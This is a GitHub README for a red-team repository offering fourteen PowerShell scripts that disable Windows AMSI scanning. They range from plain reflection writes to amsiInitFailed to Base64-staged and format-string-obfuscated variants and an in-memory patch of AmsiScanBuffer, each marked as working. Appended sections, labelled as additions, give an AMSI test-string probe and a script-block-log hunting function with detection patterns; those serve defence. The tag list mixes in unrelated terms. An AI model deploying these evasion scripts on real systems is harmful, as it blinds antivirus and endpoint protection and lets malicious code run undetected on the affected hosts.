AnandJogawade/RedTeam-PowerShell-AMSI-Bypass

GitHub: AnandJogawade/RedTeam-PowerShell-AMSI-Bypass

A red-team tool that bypasses AMSI detection by modifying an internal PowerShell field, intended to solve the script-execution evasion problem in security testing.

Stars: 1 | Forks: 0

# RedTeam-PowerShell-AMSI-Bypass

# **What is AMSI**

The Microsoft Antimalware Scan Interface (AMSI) is a Windows security interface that lets applications and script engines submit content to antivirus and endpoint security products for inspection before it runs.

PowerShell integrates with AMSI so that:

- scripts
- command strings
- dynamically generated code
- de-obfuscated content

can be scanned by the installed security provider before execution continues.

Each time PowerShell is about to execute a script block (including code produced at run time, for example by Invoke-Expression), it typically:

- **sends the content buffer to AMSI**
- **AMSI forwards it to Microsoft Defender or another antivirus/EDR product**
- **the security provider analyses the content**
- **a detection verdict is returned**
- **PowerShell allows or blocks execution**

PowerShell's AMSI integration is implemented by an internal .NET class in the System.Management.Automation assembly.

## **Bypass principle**

1. **Reflection is a .NET feature that lets code**:
   - inspect assemblies;
   - enumerate types;
   - access methods and fields;
   - interact with internal members at run time.
2. **The script accesses an internal PowerShell class**:
   - System.Management.Automation.AmsiUtils.
3. **Inside this class there is a static, non-public field usually named**:
   - amsiInitFailed.
   This field records whether AMSI initialisation failed in the current PowerShell process.
4. **The script sets its value with** `SetValue($null, $true)`:
   - the first argument is the object instance to write to; it is `$null` because the field is static and belongs to no instance, not because `$null` is being stored in the field;
   - the second argument, `$true`, is the value actually written into the field.

As a result, the current PowerShell process behaves as if AMSI initialisation had failed: PowerShell skips the scan call, which effectively disables AMSI scanning for that PowerShell session. The change lives only in this process's memory; a new PowerShell process starts with AMSI initialised again.

## **Usage**

### **First run the status check command to get the current state/values of AMSI, Defender and the firewall**

- If it shows them running, run an AMSI bypass script and then run the status check script again.
- The "AMSI Status" line only reads the `amsiInitFailed` field: it reports AMSI as running whenever the field is `$false`, even when no provider is actually scanning (for example with real-time protection turned off), and it throws at `$f.GetValue($null)` if the field cannot be resolved under that name (script 12 below uses `s_amsiInitFailed` for PowerShell 6+).
- Scripts 1–4, 8, 9 and 12 contain the class and field names in plain text, which current antivirus signatures match on; that is why they are pasted one line at a time, since each line entered at the console is submitted to AMSI as its own buffer. Scripts 5–7, 10, 11, 13 and 14 avoid the plain-text names by building them from Base64, format strings or character codes instead.

**Status check**

```powershell
$s  = Get-MpComputerStatus
$fw = Get-NetFirewallProfile
$t  = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
$f  = $t.GetField('amsiInitFailed', 'NonPublic,Static')
$a  = $f.GetValue($null)    # $true once a bypass has been applied in this process
$sb = (Get-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -ErrorAction Ignore).EnableScriptBlockLogging
$tm = (Get-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription" -ErrorAction Ignore).EnableTranscripting
[pscustomobject]@{
    "Real-Time Protection"  = if ($s.RealTimeProtectionEnabled) { "TRUE & Running" } else { "Turned Off" }
    "IOAV Protection"       = if ($s.IoavProtectionEnabled) { "TRUE & Running" } else { "Turned Off" }
    "Behavior Monitoring"   = if ($s.BehaviorMonitorEnabled) { "TRUE & Running" } else { "Turned Off" }
    "Antispyware"           = if ($s.AntispywareEnabled) { "TRUE & Running" } else { "Turned Off" }
    "Anti-Malware Service"  = if ($s.AMServiceEnabled) { "TRUE & Running" } else { "Turned Off" }
    "Firewall Domain"       = if (($fw | Where-Object Name -eq 'Domain').Enabled) { "TRUE & Running" } else { "Turned Off" }
    "Firewall Private"      = if (($fw | Where-Object Name -eq 'Private').Enabled) { "TRUE & Running" } else { "Turned Off" }
    "Firewall Public"       = if (($fw | Where-Object Name -eq 'Public').Enabled) { "TRUE & Running" } else { "Turned Off" }
    "AMSI Status"           = if (-not $a) { "AMSI is Running" } else { "AMSI NOT Running / Bypassed" }
    "Script Block Logging"  = if ($sb) { "Enabled" } else { "Not Configured" }
    "Transcription Logging" = if ($tm) { "Enabled" } else { "Not Configured" }
    "Language Mode"         = $ExecutionContext.SessionState.LanguageMode
} | Format-List
```
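As an added example that is not part of this repository, the following function checks whether AMSI scanning is actually in effect in the session, rather than only reading the field as the status check above does. It assumes the two field names `amsiInitFailed` (Windows PowerShell 5.1) and `s_amsiInitFailed` (the name script 12 below uses for PowerShell 6+), and it uses Microsoft's published AMSI test string, which every registered provider is expected to flag the way a file scanner flags EICAR. The string is assembled from two halves at run time so that defining the function does not itself trip the scanner, on the assumption that providers match the contiguous string.

```powershell
# Added example (not from the repository): does this session's AMSI actually scan?
function Get-AmsiState {
    # 1. Read the init-failed flag through reflection, trying both known field names.
    $type = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
    if (-not $type) { throw 'System.Management.Automation.AmsiUtils not found in this host' }
    $field = $null
    foreach ($name in 'amsiInitFailed', 's_amsiInitFailed') {
        $field = $type.GetField($name, 'NonPublic,Static')
        if ($field) { break }
    }
    $initFailed = if ($field) { [bool]$field.GetValue($null) } else { $null }

    # 2. Behavioural probe: compile a new script block that contains the AMSI test sample.
    #    The halves are joined only here, so this function's own definition is not flagged.
    $probe = -join ('AMSI Test Sample: 7e72c3ce-861b-4339-', '8740-0ac1484c1386')
    $scanning = $null
    try {
        Invoke-Expression "'$probe'" | Out-Null   # new script block -> submitted to AMSI
        $scanning = $false                         # ran unhindered: nothing scanned, or a bypass is active
    } catch {
        if ($_.FullyQualifiedErrorId -like 'ScriptContainedMaliciousContent*') {
            $scanning = $true                      # the provider returned a detection
        } else {
            throw                                  # unrelated failure: do not misreport it as "AMSI active"
        }
    }

    [pscustomobject]@{
        FieldName  = if ($field) { $field.Name } else { '(not found)' }
        InitFailed = $initFailed
        Scanning   = $scanning
        Verdict    = if ($scanning) { 'AMSI active' } elseif ($initFailed) { 'AMSI bypassed in this process' } else { 'AMSI initialised, but no provider blocked the probe' }
    }
}

Get-AmsiState | Format-List
```

Run it before and after one of the bypass scripts: before, `Scanning` is `$true` on a host with an active provider; after, `InitFailed` flips to `$true` and the probe runs without a detection. The third verdict is the case the field alone cannot tell apart from a working AMSI: the field is `$false`, yet nothing scans because no provider is registered or real-time protection is off.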

### **1. AMSI bypass script [paste line by line, each line separately] (works)**

```powershell
$v1 = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
if ($v1) {
    $v2 = $v1.GetField('amsiInitFailed', 'NonPublic,Static')
    if ($v2) {
        # write the static field first, then report; the original printed before writing
        $v2.SetValue($null, $true)
        "AMSI Bypass Patch Applied Successfully!"
    } else { "Field not found" }
} else { "Type not resolved" }
```

### **2. AMSI bypass script [paste each line on a new line] (works)**

```powershell
$amsi = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
if (-not $amsi) { Write-Error "Type not resolved"; return }
$field = $amsi.GetField('amsiInitFailed', 'NonPublic,Static')
if (-not $field) { Write-Error "Field not found"; return }
$field.SetValue($null, $true); Write-Output "AMSI Bypass Patch Applied Successfully!"
```

### **3. AMSI bypass script [paste each line on a new line] (works)**

Scripts 2, 3 and 4 are the same logic; they differ only in spacing and variable names.

```powershell
$amsi = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
if (-not $amsi) { Write-Error "Type not resolved"; return }
$field = $amsi.GetField('amsiInitFailed', 'NonPublic,Static')
if (-not $field) { Write-Error "Field not found"; return }
$field.SetValue($null, $true); Write-Output "AMSI Bypass Patch Applied Successfully!"
```

### **4. AMSI bypass script [paste each line on a new line] (works)**

```powershell
$A1 = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
if (-not $A1) { Write-Error "Type not resolved"; return }
$A2 = $A1.GetField('amsiInitFailed', 'NonPublic,Static')
if (-not $A2) { Write-Error "Field not found"; return }
$A2.SetValue($null, $true); Write-Output "AMSI Bypass Patch Applied Successfully!"
```

### **5. AMSI bypass script [paste each line on a new line] (works)**

```powershell
# $c decodes to: $a = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils'); $b = $a.GetField('amsiInitFailed','NonPublic,Static');
$c = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGEgPSBbUmVmXS5Bc3NlbWJseS5HZXRUeXBlKCdTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkFtc2lVdGlscycpOyAkYiA9ICRhLkdldEZpZWxkKCdhbXNpSW5pdEZhaWxlZCcsJ05vblB1YmxpYyxTdGF0aWMnKTs=')); iex $c
# $d decodes to: $b.SetValue($null,$true);
$d = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGIuU2V0VmFsdWUoJG51bGwsJHRydWUpOw==')); iex $d; Write-Output "AMSI Bypass Patch Applied Successfully!"
```

### **6. AMSI bypass script [paste each line on a new line] (works)**

```powershell
# The format-string expression below yields the hex encoding of 'System.Management.Automation.AmsiUtils';
# the regex splits it into byte pairs and each pair is converted back to a character.
${byP`Ass} = (-join ([regex]::Matches(("{7}{11}{10}{14}{5}{9}{13}{6}{15}{2}{0}{4}{1}{16}{12}{8}{3}" -f'e2',("{0}{1}"-f '41','6d'),'6',("{2}{0}{1}" -f'9',("{1}{0}"-f '73','6c'),('7'+'46')),'e',('61'+'6'),'6',("{1}{0}{3}{2}"-f'37','5','6',("{1}{2}{0}" -f'65',('97'+'3'),'74')),('95'+'5'),("{3}{2}{0}{1}"-f '6',("{1}{0}"-f('74'+'2'),'e'),'5',("{0}{1}" -f '76',("{0}{1}"-f'5',('6d'+'6')))),'e4','d2','36',("{3}{0}{1}{2}" -f ('41'+'7'),("{1}{0}"-f '46','57'),('f6'+'d'),'e'),("{1}{0}"-f '6e',('d6'+'1')),("{2}{1}{0}" -f("{0}{1}" -f("{0}{1}" -f('46'+'9'),'6'),'f'),'7','1'),'7'), '..') | ForEach-Object { [char]([convert]::ToUInt32(${_}.Value, 16)) }))
# The byte list is 'amsiInitFailed'
${am`si} = [Text.Encoding]::UTF8.GetString((0x61,0x6d,0x73,0x69,0x49,0x6e,0x69,0x74,0x46,0x61,0x69,0x6c,0x65,0x64))
${aS`sEm`BLY} = [Ref].Assembly
${Ty`PE} = ${ASsemB`LY}.GetType(${ByP`A`Ss})
# The format string builds the binding flags 'NonPublic, Static'
${fIE`ld} = ${t`Ype}.GetField(${A`msi}, ("{3}{2}{4}{0}{1}" -f("{1}{0}" -f 'ti',('S'+'ta')),'c',('on'+'P'),'N',("{1}{0}" -f("{1}{0}"-f', ',("{0}{1}"-f('b'+'li'),'c')),'u')))
${F`IELd}.SetValue(${N`UlL}, ${TR`Ue})
```

### **7. AMSI bypass script [one-liner] (works)**

Same two Base64 stages as script 5, on a single line.

```powershell
$c = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGEgPSBbUmVmXS5Bc3NlbWJseS5HZXRUeXBlKCdTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkFtc2lVdGlscycpOyAkYiA9ICRhLkdldEZpZWxkKCdhbXNpSW5pdEZhaWxlZCcsJ05vblB1YmxpYyxTdGF0aWMnKTs=')); iex $c; $d = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGIuU2V0VmFsdWUoJG51bGwsJHRydWUpOw==')); iex $d; Write-Output "AMSI Bypass Patch Applied Successfully!"
```

### **8. AMSI bypass script [one-liner] (works)**

```powershell
[System.Reflection.Assembly]::LoadWithPartialName('System.Management.Automation').GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```

### **9. AMSI bypass script [one-liner] (works)**

```powershell
$t=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils'); if($t){$f=$t.GetField('amsiInitFailed','NonPublic,Static'); $target=$null; $value=$true; if($f){$f.SetValue($target,$value); "AMSI Bypass Patch Applied Successfully!"} else {"Field missing"}} else {"Type missing"}
```

### **10. AMSI bypass script [obfuscated one-liner (most reliable)] (works on older Windows)**

```powershell
S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
```

### **11. AMSI bypass script [Base64-encoded one-liner for restricted environments] (works on older Windows)**

The two UTF-16 Base64 strings decode to `AmsiUtils` and `amsiInitFailed`.

```powershell
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
```

### **12. AMSI bypass script [PowerShell 6+ one-liner] (works on older Windows)**

```powershell
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('s_amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```

### **13. AMSI bypass script [obfuscated one-liner] (works on older Windows)**

```powershell
S`eT-It`em ( 'V'+'aR' + 'IA' + (("{1}{0}"-f'1','blE:')+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),(("{0}{1}" -f '.M','an')+'age'+'men'+'t.'),('u'+'to'+("{0}{2}{1}" -f 'ma','.','tion')),'s',(("{1}{0}"-f 't','Sys')+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+("{0}{1}" -f 'ni','tF')+("{1}{0}"-f 'ile','a')) ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+("{1}{0}" -f'ubl','P')+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ); Write-Output "AMSI Bypass Patch Applied Successfully!"
```

### **14. AMSI bypass script [copy and save this script as a .ps1 file, then run it in PowerShell] (works on older Windows)**

This script applies two patches in turn: the reflection write to `amsiInitFailed`, then an in-memory patch of `AmsiScanBuffer` in amsi.dll so that every scan call returns `E_INVALIDARG` without scanning.

```powershell
# Stage 1: the reflection patch, with both names built from character codes so that neither
# "AmsiUtils" nor "amsiInitFailed" appears in the file as plain text. Assembly.GetType needs the
# namespace-qualified name, and the field lookup is case-sensitive: the field is amsiInitFailed
# with a lower-case a ([char]97).
$A = [Ref].Assembly.GetType('System.Management.Automation.' + (([char]65)+([char]109)+([char]115)+([char]105)+([char]85)+([char]116)+([char]105)+([char]108)+([char]115)))
$F = $A.GetField((([char]97)+([char]109)+([char]115)+([char]105)+([char]73)+([char]110)+([char]105)+([char]116)+([char]70)+([char]97)+([char]105)+([char]108)+([char]101)+([char]100)), 'NonPublic,Static')
$F.SetValue($null, $true)

# Stage 2: overwrite the first bytes of amsi!AmsiScanBuffer. The export lives in amsi.dll, so the
# module handle has to come from amsi.dll itself; the HINSTANCE of the managed
# System.Management.Automation module does not export AmsiScanBuffer.
$Win32 = 'Win32Functions.Win32' -as [type]
if (-not $Win32) {
    $Win32 = Add-Type -MemberDefinition @'
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr LoadLibrary(string lpFileName);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
'@ -Name 'Win32' -Namespace 'Win32Functions' -PassThru
}

$AmsiDLL = $Win32::LoadLibrary('amsi.dll')
$AmsiScanBufferPtr = $Win32::GetProcAddress($AmsiDLL, 'AmsiScanBuffer')
if ($AmsiScanBufferPtr -eq [IntPtr]::Zero) { throw 'AmsiScanBuffer could not be resolved' }

$Patch = [byte[]]@(0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)   # mov eax, 0x80070057 ; ret

$oldProtect = 0
$Win32::VirtualProtect($AmsiScanBufferPtr, [uint32]$Patch.Length, 0x40, [ref]$oldProtect) | Out-Null   # PAGE_EXECUTE_READWRITE
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $AmsiScanBufferPtr, $Patch.Length)
$Win32::VirtualProtect($AmsiScanBufferPtr, [uint32]$Patch.Length, $oldProtect, [ref]$oldProtect) | Out-Null
Write-Output "AMSI Bypass Patch Applied Successfully!"
```

### **Proof of concept**

![AMSI bypass](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/4ae5f7f50e042440.png)
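On the defensive side, as an added example that is not part of this repository: the scripts above are visible in PowerShell script block logging, and Windows PowerShell 5.1 logs script blocks it considers suspicious at Warning level even when the Script Block Logging policy the status check reads is not configured. The hunting function below assumes the documented layout of Event ID 4104 in `Microsoft-Windows-PowerShell/Operational`, where the script block text is the third event property (`Properties[2]`) and the script block ID the fourth. The indicator patterns and the offline sample texts are this example's own; the samples are constructed from the scripts on this page.

```powershell
# Added example (not from the repository): hunt for AMSI tampering in script block logs.
$AmsiTamperPatterns = @(
    'AmsiUtils',                                     # the internal class in plain text
    '(s_)?amsiInitFailed',                           # the field: the 5.1 name and the 6+ name
    'AmsiScanBuffer',                                # in-memory patch variants
    'amsi\.dll',
    'FromBase64String.*\b(iex|Invoke-Expression)\b'  # decode-then-execute staging
)

function Test-AmsiTamperIndicator {
    param([string]$ScriptBlockText)
    # Returns the patterns that match; an empty array means nothing suspicious.
    # -match is case-insensitive, so AmsiUtils and amsiutils both hit.
    @($AmsiTamperPatterns | Where-Object { $ScriptBlockText -match $_ })
}

function Find-AmsiTamperScriptBlocks {
    param([int]$MaxEvents = 5000)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction Stop | ForEach-Object {
        $text = [string]$_.Properties[2].Value        # ScriptBlockText
        $hits = Test-AmsiTamperIndicator -ScriptBlockText $text
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                TimeCreated   = $_.TimeCreated
                Level         = $_.LevelDisplayName   # 'Warning' = PowerShell's own suspicious-block logging
                ScriptBlockId = $_.Properties[3].Value
                Indicators    = $hits -join ', '
                Snippet       = $text.Substring(0, [Math]::Min(100, $text.Length))
            }
        }
    }
}

# Constructed sample script block texts, standing in for Properties[2] so this runs offline.
$samples = @(
    # script 8 as typed: matches on class and field name
    "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue(`$null,`$true)",
    # the outer layer of script 5/7: no plain names, but decode-then-iex staging
    "`$d = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGIuU2V0VmFsdWUoJG51bGwsJHRydWUpOw==')); iex `$d",
    # what 'iex $c' of script 5/7 logs as its own script block: the decoded first stage
    "`$a = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils'); `$b = `$a.GetField('amsiInitFailed','NonPublic,Static');",
    # what 'iex $d' logs: innocuous on its own, so correlate by time with the stage above
    "`$b.SetValue(`$null,`$true);",
    "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"
)
foreach ($s in $samples) {
    $hits = Test-AmsiTamperIndicator -ScriptBlockText $s
    '{0,-7} {1}' -f ($(if ($hits.Count) { 'SUSPECT' } else { 'clean' }), $s)
}
```

The fourth sample is the point to take away: a staged bypass leaves its decoded second stage in the log as a separate 4104 event that matches nothing by itself, so the staging pattern and the events adjacent in time are what tie it back to the first stage. On a live host, call `Find-AmsiTamperScriptBlocks` instead of the sample loop; it requires read access to the operational log.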
Tags: AI compliance, AMSI bypass, Conpot, EDR bypass, .NET reflection, PowerShell scripts, Windows security, dynamic code execution, multi-person tracking, threat detection, security interface bypass, malware evasion, attack techniques, system management automation, cybersecurity, script execution bypass, antivirus evasion, privacy protection, high-interaction honeypot